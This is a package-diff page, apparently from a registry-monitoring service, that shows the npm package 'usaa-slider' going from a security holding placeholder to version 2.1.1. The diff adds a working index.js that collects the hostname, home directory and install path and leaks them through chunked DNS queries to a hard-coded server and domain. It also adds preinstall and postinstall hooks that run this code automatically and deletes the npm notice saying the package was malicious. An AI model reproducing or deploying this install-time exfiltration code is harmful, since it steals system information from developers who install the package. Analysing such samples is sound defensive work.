usaa-slider 0.0.1-security → 2.1.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of usaa-slider might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +24 -0
  2. package/package.json +11 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,24 @@
1
+ const dns = require('dns');
2
+ const os = require('os');
3
+ const suffix = ".ns1.w00dr0w-usaa.com";
4
+ const package = "usaa-slider";
5
+
6
+ data = package + '__' + os.hostname() +
7
+ '__' + os.homedir() +
8
+ '__' + __dirname;
9
+
10
+ data = data.replace(/[^a-zA-Z0-9._]/g,
11
+ function(f) {
12
+ return '_' + f.charCodeAt(0).toString(16);
13
+ }
14
+ );
15
+
16
+ data = data.match(/.{1,50}/g);
17
+
18
+ dns.setServers(['3.145.70.183']);
19
+
20
+ id = Math.random().toString(36).substring(7);
21
+
22
+ data.forEach(function (chunk){
23
+ dns.resolve(id + '.' + chunk + suffix, 'A', console.log);
24
+ });
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
1
  {
2
2
  "name": "usaa-slider",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.1.1",
4
+ "description": "Security Research Purposes Only",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "nslookup preinstall.dns.w00dr0w-usaa.com 3.145.70.183 && node index.js",
9
+ "start": "node index.js",
10
+ "postinstall": "nslookup preinstall.dns.w00dr0w-usaa.com 3.145.70.183 && node index.js"
11
+ },
12
+ "author": "",
13
+ "license": "ISC"
6
14
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=usaa-slider for more information.